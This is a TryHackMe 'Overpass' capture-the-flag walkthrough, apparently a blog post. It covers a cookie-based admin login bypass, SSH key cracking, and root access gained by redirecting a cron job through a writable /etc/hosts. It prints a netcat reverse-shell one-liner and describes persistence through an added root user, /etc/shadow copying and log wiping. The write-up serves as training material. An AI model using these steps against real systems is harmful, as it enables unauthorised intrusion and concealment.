IP = 10.10.56.108*
Difficulty: Easy
Machine OS: Linux
Learning Platform: tryhackme.com
Finished on: Arch Linux
Reconnaissance
Scoping and Preparation
Connect to OpenVPN Server using:
sudo openvpn {PATH_TO_OVPN_FILE}
I used my tool CTFRecon-Go to automate directory creation, port scanning, web directory brute-forcing and adding entry to /etc/hosts
file.
Alternatively, you can also download the release binary for CTFRecon-Go
: https://github.com/hambyhacks/CTFRecon-Go/releases/download/v.1.0.0/CTFRecon-Go
Enumeration
Preliminary Enumeration via nmap
Table 1.1: nmap Results Summary
Machine OS: Based on OpenSSH version, machine is Ubuntu Bionic.
Let's look at the HTTP
server on port 80.
Web Enumeration
On the homepage of overpass.thm
, we can see that developers offer password encryption app.
Let's check the source code of the webpage to see if there is developer comments on the code.
There is a comment on the source code! Searching through Google, I found out that the developer pointed out that the encryption method they use is Caesar Cipher. We can verify the encryption later in the source code analysis of the password encryption app.
Checking on GoBuster
scan results, we can see that there is 2 directories that is interesting. /admin
and /downloads/
.
Let's look first for the /downloads
directory.
Let's download the source code and take notes of it.
Reading through the source code, it seems that it saves the encrypted password in a file named .overpass
.
Interesting, the binary is using ROT47
cipher which is based on Caesar Cipher! (which is referenced by the developer in the source code comment on homepage)
Let's take note of this and come back for it later.
We can also look on the /aboutus
page to check for usernames.
We can now look for the /admin
page.
Testing the login page for SQL injection
does not work, so I looked for the source code of /admin
page.
There are .js
files in the /admin
page. Let's check the contents of that files.
Main.js
It seems like the web app is not finished yet.
Login.js
The function login
is calling to /api/login
and the StatusOrCookies
variable is expecting Incorrect Credentials
to load the /admin
page. We can try to submit empty cookie to see the response of the webpage.
Exploitation
Now we have the basic understanding how the web app authentication works, we can now try to exploit the web app.
Steps to Reproduce
- Navigate to
/admin/
page. - Open up developer console (
F12
orRight click and Click inspect
) in your preferred browser (Firefox is used in this case). - Navigate to
storage
tab and click oncookies
. - Click on
+
icon and rename the cookie toSessionToken
with your desired value. (even space will work)
5. Reload the page using CTRL + R
. We should be redirected to the admin page as shown by the image below.
6. Copy the id_rsa
content displayed on /admin
page. The comment above tells us the user having this SSH private key belongs to James
user.
7. We can use SSH2john
to create a crackable format for JohnTheRipper
tool to use and retrieve the password of the encrypted id_rsa
file.
ssh2john [ID_RSA file] > [OUTPUT FILE]
john [OUTPUT FILE]
Login through SSH
using the crack id_rsa
file with the password we found using john
.
Table 1.2: Credentials
Post-Exploitation
Enumeration
Table 1.3: Checklist for Linux Internal Enumeration
Notes: For more information about the commands look here.
Tip: When nothing else makes sense, try to use LinPEAS (winPEAS for windows machines.).
Looking in the home
directory of James
, we can see there are some interesting files named .overpass
, user.txt
and todo.txt
.
Todo.txt
It seems James
used the app to encrypt his password. Knowing that .overpass
file is the encrypted password of James
we can copy its contents to decrypt. We use CyberChef
for this process.
We can now use sudo
! But after doing that James
is not allowed to use sudo
.
Looking at the /etc/crontab
, we found out that there is a cron job that is running as root
! The cron job is running every minute and executing buildscript.sh
using bash after sending GET
request using curl
.
Let's look for the /etc/hosts
file since the cronjob is using overpass.thm
as its Host.
As you can see on the image above, the /etc/hosts
file has faulty permissions.
Typically the /etc/hosts
file has permissions of -rw-r--r--
meaning the root
user has only the permission to write to the file.
We can use this to our advantage by editing the IP of the overpass.thm
entry on /etc/hosts
file.
Privilege Escalation
Knowing that the cron job is executing as root
user and we can edit the content of /etc/hosts
file. We can now try to escalate our privileges.
- Edit the
/etc/hosts
file by replacing the IP beside the entryoverpass.thm
to your Attacking Machine's IP.
2. In your Attacking machine, create directories that looks like in the crontab entry.
3. Create a file named buildscript.sh
in /downloads/src/
directory you just created.
4. Make the contents of buildscript.sh
to a reverse shell using any text editor you want.
buildscript.sh
content:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {IP} {PORT} >/tmp/f
Go back 2 directories and open up a http server in port 80 using python
.
cd ../../
sudo python3 -m http.server 80
- Setup a reverse shell listener using
nc
. - If you set it up properly, it should look like this.
Wait for 1 minute and the root
shell should pop.
STATUS: ROOTED
The next two steps are not necessary for completion of the machine but it completes the 5 Phases of Penetration Testing.
Persistence
Copied the /etc/shadow file for user identification and their passwords.
Added another root user for easy access.
Clearing Tracks
Removed all logs and footprints to to prevent risk of exposure of breach to security administrator.
Status: Finished
Feel free to reach out and if there is something wrong about the above post. Feedback are also appreciated! :D
Donation Box
Not required but appreciated! :D
Socials
Originally published at https://hambyhacks.hashnode.dev.